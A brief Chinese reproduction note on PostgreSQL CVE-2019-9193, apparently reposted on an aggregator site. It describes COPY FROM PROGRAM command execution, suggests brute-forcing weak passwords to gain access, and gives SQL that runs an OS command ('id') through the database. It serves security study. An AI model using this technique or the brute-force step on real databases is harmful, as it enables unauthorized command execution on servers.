【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)
漏洞介绍
这个漏洞是一个版本漏洞
从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
利用的前提
- 1、需要登录
- 2、需要高权限
所以要先弱口令爆破之后,然后查看是否是高权限。
exp
复制代码
1
2
3
4DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id';
最后
以上就是美好发带最近收集整理的关于【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp的全部内容,更多相关【漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)漏洞介绍exp内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复